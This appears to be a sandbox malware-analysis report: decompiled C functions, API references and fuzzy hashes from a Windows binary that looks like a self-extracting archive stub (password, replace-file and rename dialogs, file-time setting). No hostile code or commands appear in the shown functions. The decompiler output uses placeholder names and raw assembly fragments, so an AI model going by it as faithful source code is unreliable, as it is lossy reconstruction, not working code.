                  • Part of subcall function 00CA12D7: SetWindowTextW.USER32(00000000,00CD22E4), ref: 00CA1331
                • EndDialog.USER32(?,00000001), ref: 00CBA0FE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00CBA116
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CBA144
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1
                • API String ID: 445417207-3292211884
                • Opcode ID: 79368209124086b8bfa12952b1250d7b82c8fa9ee528a5c22e15f1c3a6a55865
                • Instruction ID: 47b9cf2cb4048394f5486c338e6345d6994be21c4b11e542ef1da6b109770737
                • Opcode Fuzzy Hash: 79368209124086b8bfa12952b1250d7b82c8fa9ee528a5c22e15f1c3a6a55865
                • Instruction Fuzzy Hash: D011C832940219BADB219E6D9D49FFF7B7CEB4A754F010021FA87F3080C6769A5196B2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 70%
                			E00CAB1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
                				short _t10;
                				void* _t13;
                				signed int _t14;
                				short* _t20;
                				void* _t23;
                				signed short* _t27;
                				signed int _t29;
                				signed int _t31;
                
                				_t20 = _a8;
                				_t27 = _a4;
                				 *_t20 = 0;
                				_t10 = E00CAB4C6(_t27);
                				if(_t10 == 0) {
                					_t29 = 0x5c;
                					if( *_t27 == _t29 && _t27[1] == _t29) {
                						_push(_t29);
                						_push( &(_t27[2]));
                						_t10 = E00CC0BB8(__ecx);
                						_pop(_t23);
                						if(_t10 != 0) {
                							_push(_t29);
                							_push(_t10 + 2);
                							_t13 = E00CC0BB8(_t23);
                							if(_t13 == 0) {
                								_t14 = E00CC2B33(_t27);
                							} else {
                								_t14 = (_t13 - _t27 >> 1) + 1;
                							}
                							asm("sbb esi, esi");
                							_t31 = _t29 & _t14;
                							E00CC4DDA(_t20, _t27, _t31);
                							_t10 = 0;
                							 *((short*)(_t20 + _t31 * 2)) = 0;
                						}
                					}
                					return _t10;
                				}
                				return E00CA3E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
                			}












                APIs
                • _swprintf.LIBCMT ref: 00CAB1DE
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • _wcschr.LIBVCRUNTIME ref: 00CAB1FC
                • _wcschr.LIBVCRUNTIME ref: 00CAB20C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: b904eacc324198538979fc62e1bf56a257dac84b509757260a170705470a603e
                • Instruction ID: 4b10341cd93bbfb0a59b1cb584f738ecd58b1f8107c1401de0feacea54fe8bc2
                • Opcode Fuzzy Hash: b904eacc324198538979fc62e1bf56a257dac84b509757260a170705470a603e
                • Instruction Fuzzy Hash: 8E01F5235003136AAA24AB75DC42E6FA7ACDE97764B50851BFC54C2183FB30DD50D2B1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 74%
                			E00CB0326(long* __ecx, long _a4) {
                				void* __esi;
                				void* __ebp;
                				long _t11;
                				void* _t14;
                				long _t23;
                				long* _t25;
                
                				_t19 = __ecx;
                				_t11 = _a4;
                				_t25 = __ecx;
                				_t23 = 0x40;
                				 *__ecx = _t11;
                				if(_t11 > _t23) {
                					 *__ecx = _t23;
                				}
                				if( *_t25 == 0) {
                					 *_t25 = 1;
                				}
                				_t25[0x41] = 0;
                				if( *_t25 > _t23) {
                					 *_t25 = _t23;
                				}
                				_t3 =  &(_t25[0xc8]); // 0x320
                				_t25[0xc5] = 0;
                				InitializeCriticalSection(_t3);
                				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
                				_t14 = CreateEventW(0, 1, 1, 0);
                				_t25[0xc7] = _t14;
                				if(_t25[0xc6] == 0 || _t14 == 0) {
                					_push(L"\nThread pool initialization failed.");
                					_push(0xce00e0);
                					E00CA6CC9(E00CA6CCE(_t19), 0xce00e0, _t25, 2);
                				}
                				_t25[0xc3] = 0;
                				_t25[0xc4] = 0;
                				_t25[0x42] = 0;
                				return _t25;
                			}










                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CAA865,00000008,00000000,?,?,00CAC802,?,00000000,?,00000001,?), ref: 00CB035F
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CAA865,00000008,00000000,?,?,00CAC802,?,00000000), ref: 00CB0369
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CAA865,00000008,00000000,?,?,00CAC802,?,00000000), ref: 00CB0379
                Strings
                • Thread pool initialization failed., xrefs: 00CB0391
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: e63ea28fd69a556bde7aad076c0d0d75598214c60f41d1b1560225bcfbe6245c
                • Instruction ID: 0ce33770705764ca691ac07d47121c8e96fbfd48ead65042ed3038b964bcac4e
                • Opcode Fuzzy Hash: e63ea28fd69a556bde7aad076c0d0d75598214c60f41d1b1560225bcfbe6245c
                • Instruction Fuzzy Hash: 131186B15017049FC3315F65DCC8AABFBECEB65358F20482EF1EA83211D6716A80CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CBC96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                				long _v0;
                				_Unknown_base(*)()* _t16;
                				int _t22;
                				WCHAR* _t25;
                
                				 *0xcfce10 = _a12;
                				 *0xcfce14 = _a16;
                				 *0xce75f4 = _a20;
                				if( *0xce75d3 == 0) {
                					if( *0xce75d2 == 0) {
                						_t16 = E00CBAFB9;
                						_t25 = L"REPLACEFILEDLG";
                						while(1) {
                							_t22 = DialogBoxParamW( *0xce0064, _t25,  *0xce75c8, _t16, _a4);
                							if(_t22 != 4) {
                								break;
                							}
                							if(DialogBoxParamW( *0xce0060, L"RENAMEDLG",  *0xce75d8, E00CBC2A7, _v0) != 0) {
                								break;
                							}
                						}
                						return _t22;
                					}
                					return 1;
                				}
                				return 0;
                			}








                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: 8196fc1eb87d5a6ae6380352f147a5e0120b5dbb7e60a077f81c0f6c8fd17c13
                • Instruction ID: 537f04c4079196a520f3b9448e6d2cf3c32fa63e5b42659a9ff08e0f55972299
                • Opcode Fuzzy Hash: 8196fc1eb87d5a6ae6380352f147a5e0120b5dbb7e60a077f81c0f6c8fd17c13
                • Instruction Fuzzy Hash: 2801D472A09285AFD7009B59EEC0BAFBBE9E745750F010526F552E6230C7719D10DB62
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E00CC8749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				unsigned int _v20;
                				signed int _v28;
                				signed int _v32;
                				signed int _v36;
                				char _v40;
                				intOrPtr _v48;
                				char _v52;
                				void* __ebx;
                				void* __edi;
                				void* _t86;
                				signed int _t92;
                				signed int _t93;
                				signed int _t94;
                				signed int _t100;
                				void* _t101;
                				void* _t102;
                				void* _t104;
                				void* _t107;
                				void* _t109;
                				void* _t111;
                				void* _t115;
                				char* _t116;
                				void* _t119;
                				signed int _t121;
                				signed int _t128;
                				signed int* _t129;
                				signed int _t136;
                				signed int _t137;
                				char _t138;
                				signed int _t139;
                				signed int _t142;
                				signed int _t146;
                				signed int _t151;
                				char _t156;
                				char _t157;
                				void* _t161;
                				unsigned int _t162;
                				signed int _t164;
                				signed int _t166;
                				signed int _t170;
                				void* _t171;
                				signed int* _t172;
                				signed int _t174;
                				signed int _t181;
                				signed int _t182;
                				signed int _t183;
                				signed int _t184;
                				signed int _t185;
                				signed int _t186;
                				signed int _t187;
                
                				_t171 = __edx;
                				_t181 = _a24;
                				if(_t181 < 0) {
                					_t181 = 0;
                				}
                				_t184 = _a8;
                				 *_t184 = 0;
                				E00CC3356(0,  &_v52, _t171, _a36);
                				_t5 = _t181 + 0xb; // 0xb
                				if(_a12 > _t5) {
                					_t172 = _a4;
                					_t142 = _t172[1];
                					_v36 =  *_t172;
                					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                						L11:
                						__eflags = _t142 & 0x80000000;
                						if((_t142 & 0x80000000) != 0) {
                							 *_t184 = 0x2d;
                							_t184 = _t184 + 1;
                							__eflags = _t184;
                						}
                						__eflags = _a28;
                						_v16 = 0x3ff;
                						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                						__eflags = _t172[1] & 0x7ff00000;
                						_v32 = _t136;
                						_t86 = 0x30;
                						if((_t172[1] & 0x7ff00000) != 0) {
                							 *_t184 = 0x31;
                							_t185 = _t184 + 1;
                							__eflags = _t185;
                						} else {
                							 *_t184 = _t86;
                							_t185 = _t184 + 1;
                							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                							__eflags = _t164;
                							if(_t164 != 0) {
                								_v16 = 0x3fe;
                							} else {
                								_v16 = _v16 & _t164;
                							}
                						}
                						_t146 = _t185;
                						_t186 = _t185 + 1;
                						_v28 = _t146;
                						__eflags = _t181;
                						if(_t181 != 0) {
                							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
                						} else {
                							 *_t146 = 0;
                						}
                						_t92 = _t172[1] & 0x000fffff;
                						__eflags = _t92;
                						_v20 = _t92;
                						if(_t92 > 0) {
                							L23:
                							_t33 =  &_v8;
                							 *_t33 = _v8 & 0x00000000;
                							__eflags =  *_t33;
                							_t147 = 0xf0000;
                							_t93 = 0x30;
                							_v12 = _t93;
                							_v20 = 0xf0000;
                							do {
                								__eflags = _t181;
                								if(_t181 <= 0) {
                									break;
                								}
                								_t119 = E00CBDAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                								_t161 = 0x30;
                								_t121 = _t119 + _t161 & 0x0000ffff;
                								__eflags = _t121 - 0x39;
                								if(_t121 > 0x39) {
                									_t121 = _t121 + _t136;
                									__eflags = _t121;
                								}
                								_t162 = _v20;
                								_t172 = _a4;
                								 *_t186 = _t121;
                								_t186 = _t186 + 1;
                								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                								_t147 = _t162 >> 4;
                								_t93 = _v12 - 4;
                								_t181 = _t181 - 1;
                								_v20 = _t162 >> 4;
                								_v12 = _t93;
                								__eflags = _t93;
                							} while (_t93 >= 0);
                							__eflags = _t93;
                							if(_t93 < 0) {
                								goto L39;
                							}
                							_t115 = E00CBDAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                							__eflags = _t115 - 8;
                							if(_t115 <= 8) {
                								goto L39;
                							}
                							_t54 = _t186 - 1; // 0xcc3fc1
                							_t116 = _t54;
                							_t138 = 0x30;
                							while(1) {
                								_t156 =  *_t116;
                								__eflags = _t156 - 0x66;
                								if(_t156 == 0x66) {
                									goto L33;
                								}
                								__eflags = _t156 - 0x46;
                								if(_t156 != 0x46) {
                									_t139 = _v32;
                									__eflags = _t116 - _v28;
                									if(_t116 == _v28) {
                										_t57 = _t116 - 1;
                										 *_t57 =  *(_t116 - 1) + 1;
                										__eflags =  *_t57;
                									} else {
                										_t157 =  *_t116;
                										__eflags = _t157 - 0x39;
                										if(_t157 != 0x39) {
                											 *_t116 = _t157 + 1;
                										} else {
                											 *_t116 = _t139 + 0x3a;
                										}
                									}
                									goto L39;
                								}
                								L33:
                								 *_t116 = _t138;
                								_t116 = _t116 - 1;
                							}
                						} else {
                							__eflags =  *_t172;
                							if( *_t172 <= 0) {
                								L39:
                								__eflags = _t181;
                								if(_t181 > 0) {
                									_push(_t181);
                									_t111 = 0x30;
                									_push(_t111);
                									_push(_t186);
                									E00CBE920(_t181);
                									_t186 = _t186 + _t181;
                									__eflags = _t186;
                								}
                								_t94 = _v28;
                								__eflags =  *_t94;
                								if( *_t94 == 0) {
                									_t186 = _t94;
                								}
                								__eflags = _a28;
                								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                								_t174 = _a4[1];
                								_t100 = E00CBDAC0( *_a4, 0x34, _t174);
                								_t137 = 0;
                								_t151 = (_t100 & 0x000007ff) - _v16;
                								__eflags = _t151;
                								asm("sbb ebx, ebx");
                								if(__eflags < 0) {
                									L47:
                									 *(_t186 + 1) = 0x2d;
                									_t187 = _t186 + 2;
                									__eflags = _t187;
                									_t151 =  ~_t151;
                									asm("adc ebx, 0x0");
                									_t137 =  ~_t137;
                									goto L48;
                								} else {
                									if(__eflags > 0) {
                										L46:
                										 *(_t186 + 1) = 0x2b;
                										_t187 = _t186 + 2;
                										L48:
                										_t182 = _t187;
                										_t101 = 0x30;
                										 *_t187 = _t101;
                										__eflags = _t137;
                										if(__eflags < 0) {
                											L56:
                											__eflags = _t187 - _t182;
                											if(_t187 != _t182) {
                												L60:
                												_push(0);
                												_push(0xa);
                												_push(_t137);
                												_push(_t151);
                												_t102 = E00CBDE00();
                												_v32 = _t174;
                												 *_t187 = _t102 + 0x30;
                												_t187 = _t187 + 1;
                												__eflags = _t187;
                												L61:
                												_t104 = 0x30;
                												_t183 = 0;
                												__eflags = 0;
                												 *_t187 = _t151 + _t104;
                												 *(_t187 + 1) = 0;
                												goto L62;
                											}
                											__eflags = _t137;
                											if(__eflags < 0) {
                												goto L61;
                											}
                											if(__eflags > 0) {
                												goto L60;
                											}
                											__eflags = _t151 - 0xa;
                											if(_t151 < 0xa) {
                												goto L61;
                											}
                											goto L60;
                										}
                										if(__eflags > 0) {
                											L51:
                											_push(0);
                											_push(0x3e8);
                											_push(_t137);
                											_push(_t151);
                											_t107 = E00CBDE00();
                											_v32 = _t174;
                											 *_t187 = _t107 + 0x30;
                											_t187 = _t187 + 1;
                											__eflags = _t187 - _t182;
                											if(_t187 != _t182) {
                												L55:
                												_push(0);
                												_push(0x64);
                												_push(_t137);
                												_push(_t151);
                												_t109 = E00CBDE00();
                												_v32 = _t174;
                												 *_t187 = _t109 + 0x30;
                												_t187 = _t187 + 1;
                												__eflags = _t187;
                												goto L56;
                											}
                											L52:
                											__eflags = _t137;
                											if(__eflags < 0) {
                												goto L56;
                											}
                											if(__eflags > 0) {
                												goto L55;
                											}
                											__eflags = _t151 - 0x64;
                											if(_t151 < 0x64) {
                												goto L56;
                											}
                											goto L55;
                										}
                										__eflags = _t151 - 0x3e8;
                										if(_t151 < 0x3e8) {
                											goto L52;
                										}
                										goto L51;
                									}
                									__eflags = _t151;
                									if(_t151 < 0) {
                										goto L47;
                									}
                									goto L46;
                								}
                							}
                							goto L23;
                						}
                					}
                					__eflags = 0;
                					if(0 != 0) {
                						goto L11;
                					} else {
                						_t183 = E00CC8A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                						__eflags = _t183;
                						if(_t183 == 0) {
                							_t128 = E00CD0FD0(_t184, 0x65);
                							_pop(_t166);
                							__eflags = _t128;
                							if(_t128 != 0) {
                								__eflags = _a28;
                								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                								__eflags = _t170;
                								 *_t128 = _t170;
                								 *((char*)(_t128 + 3)) = 0;
                							}
                							_t183 = 0;
                						} else {
                							 *_t184 = 0;
                						}
                						goto L62;
                					}
                				} else {
                					_t129 = E00CC7ECC();
                					_t183 = 0x22;
                					 *_t129 = _t183;
                					E00CC7DAB();
                					L62:
                					if(_v40 != 0) {
                						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                					}
                					return _t183;
                				}
                			}

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                • Instruction ID: dea1bc856a489622252f47644fbe869718a9a044c73b3127b6e06dfb4495bdaa
                • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                • Instruction Fuzzy Hash: 3AA178329043869FDB21CF18C881FBFBBE1EF51310F28416EE4A59B282DA348E49C751
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00CA9F96(void* __edx) {
                				signed char _t40;
                				void* _t41;
                				void* _t52;
                				signed char _t70;
                				void* _t79;
                				signed int* _t81;
                				signed int* _t84;
                				void* _t85;
                				signed int* _t88;
                				void* _t90;
                
                				_t79 = __edx;
                				E00CBD940();
                				_t84 =  *(_t90 + 0x1038);
                				_t70 = 1;
                				if(_t84 == 0) {
                					L2:
                					 *(_t90 + 0x11) = 0;
                					L3:
                					_t81 =  *(_t90 + 0x1040);
                					if(_t81 == 0) {
                						L5:
                						 *(_t90 + 0x13) = 0;
                						L6:
                						_t88 =  *(_t90 + 0x1044);
                						if(_t88 == 0) {
                							L8:
                							 *(_t90 + 0x12) = 0;
                							L9:
                							_t40 = E00CA9E7F( *(_t90 + 0x1038));
                							 *(_t90 + 0x18) = _t40;
                							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
                								_t70 = 0;
                							} else {
                								E00CAA12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
                							}
                							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
                							 *(_t90 + 0x14) = _t41;
                							if(_t41 != 0xffffffff) {
                								L16:
                								if( *(_t90 + 0x11) != 0) {
                									E00CB082F(_t84, _t79, _t90 + 0x1c);
                								}
                								if( *(_t90 + 0x13) != 0) {
                									E00CB082F(_t81, _t79, _t90 + 0x2c);
                								}
                								if( *(_t90 + 0x12) != 0) {
                									E00CB082F(_t88, _t79, _t90 + 0x24);
                								}
                								_t85 =  *(_t90 + 0x14);
                								asm("sbb eax, eax");
                								asm("sbb eax, eax");
                								asm("sbb eax, eax");
                								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
                								_t52 = CloseHandle(_t85);
                								if(_t70 != 0) {
                									_t52 = E00CAA12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
                								}
                								goto L24;
                							} else {
                								_t52 = E00CAB32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
                								if(_t52 == 0) {
                									L24:
                									return _t52;
                								}
                								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
                								 *(_t90 + 0x14) = _t52;
                								if(_t52 == 0xffffffff) {
                									goto L24;
                								}
                								goto L16;
                							}
                						}
                						 *(_t90 + 0x12) = _t70;
                						if(( *_t88 | _t88[1]) != 0) {
                							goto L9;
                						}
                						goto L8;
                					}
                					 *(_t90 + 0x13) = _t70;
                					if(( *_t81 | _t81[1]) != 0) {
                						goto L6;
                					}
                					goto L5;
                				}
                				 *(_t90 + 0x11) = 1;
                				if(( *_t84 | _t84[1]) != 0) {
                					goto L3;
                				}
                				goto L2;
                			}

                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00CA7F2C,?,?,?), ref: 00CAA03C
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00CA7F2C,?,?), ref: 00CAA080
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00CA7F2C,?,?,?,?,?,?,?,?), ref: 00CAA101
                • CloseHandle.KERNEL32(?,?,00000000,?,00CA7F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAA108
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 77789900b8a99de6dc9e8f85282cd65d085ff126951de99c2486eaaa09e9674f
                • Instruction ID: 473625c40e2f95f259d193d64f758a0814f156db69015d1d65700f39cfc3bc94
                • Opcode Fuzzy Hash: 77789900b8a99de6dc9e8f85282cd65d085ff126951de99c2486eaaa09e9674f
                • Instruction Fuzzy Hash: D041AD30248382AEE721DE64DC46BEEBBE8AB86308F040919B5E1D3191D774DA4CDB53
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 85%
                			E00CCB5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                				signed int _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v24;
                				char _v28;
                				void* _v40;
                				signed int _t34;
                				signed int _t40;
                				int _t46;
                				int _t53;
                				void* _t55;
                				int _t57;
                				signed int _t63;
                				int _t67;
                				short* _t69;
                				signed int _t70;
                				short* _t71;
                
                				_t34 =  *0xcdd668; // 0x814d2927
                				_v8 = _t34 ^ _t70;
                				E00CC3356(__ebx,  &_v28, __edx, _a4);
                				_t57 = _a24;
                				if(_t57 == 0) {
                					_t6 = _v24 + 8; // 0x31e85006
                					_t53 =  *_t6;
                					_t57 = _t53;
                					_a24 = _t53;
                				}
                				_t67 = 0;
                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                				_v12 = _t40;
                				if(_t40 == 0) {
                					L15:
                					if(_v16 != 0) {
                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                					}
                					return E00CBE203(_t67, _v8 ^ _t70);
                				}
                				_t55 = _t40 + _t40;
                				asm("sbb eax, eax");
                				if((_t55 + 0x00000008 & _t40) == 0) {
                					_t69 = 0;
                					L11:
                					if(_t69 != 0) {
                						E00CBE920(_t67, _t69, _t67, _t55);
                						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                						if(_t46 != 0) {
                							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                						}
                					}
                					L14:
                					E00CC980D(_t69);
                					goto L15;
                				}
                				asm("sbb eax, eax");
                				_t48 = _t40 & _t55 + 0x00000008;
                				_t63 = _t55 + 8;
                				if((_t40 & _t55 + 0x00000008) > 0x400) {
                					asm("sbb eax, eax");
                					_t69 = E00CC7A8A(_t63, _t48 & _t63);
                					if(_t69 == 0) {
                						goto L14;
                					}
                					 *_t69 = 0xdddd;
                					L9:
                					_t69 =  &(_t69[4]);
                					goto L11;
                				}
                				asm("sbb eax, eax");
                				E00CD0EE0();
                				_t69 = _t71;
                				if(_t69 == 0) {
                					goto L14;
                				}
                				 *_t69 = 0xcccc;
                				goto L9;
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,31E85006,00CC34E6,00000000,00000000,00CC451B,?,00CC451B,?,00000001,00CC34E6,31E85006,00000001,00CC451B,00CC451B), ref: 00CCB637
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CCB6C0
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CCB6D2
                • __freea.LIBCMT ref: 00CCB6DB
                  • Part of subcall function 00CC7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: 0af3b4d8b8df3257599d640019aff3c0bdbe80a73c4d545178728acd484fcc7c
                • Instruction ID: 65b93e28bdf6ff3bd59a27f4920ab15339723aaa7c6f97cb8d0fcac854e757af
                • Opcode Fuzzy Hash: 0af3b4d8b8df3257599d640019aff3c0bdbe80a73c4d545178728acd484fcc7c
                • Instruction Fuzzy Hash: 6031BE72A0021AABDF298FA5CC46FAE7BA5EB40710F18416DFC14DB190E735DE51DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CBA4F8(void* __edx, void* __fp0) {
                				intOrPtr _v20;
                				intOrPtr _v24;
                				void _v28;
                				void* _t11;
                				void* _t13;
                				signed int _t18;
                				signed int _t19;
                				void* _t21;
                				void* _t22;
                				void* _t26;
                				void* _t32;
                
                				_t32 = __fp0;
                				_t21 = __edx;
                				_t22 = LoadBitmapW( *0xce0060, 0x65);
                				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
                				_t28 = _t19;
                				if(_t19 != 0) {
                					_t22 = E00CB963A(0x65);
                				}
                				GetObjectW(_t22, 0x18,  &_v28);
                				if(E00CB952A(_t28) != 0) {
                					if(_t19 != 0) {
                						_t26 = E00CB963A(0x66);
                						if(_t26 != 0) {
                							DeleteObject(_t22);
                							_t22 = _t26;
                						}
                					}
                					_t11 = E00CB958C(_v20);
                					_t13 = E00CB975D(_t21, _t32, _t22, E00CB9549(_v24), _t11);
                					DeleteObject(_t22);
                					_t22 = _t13;
                				}
                				return _t22;
                			}

                APIs
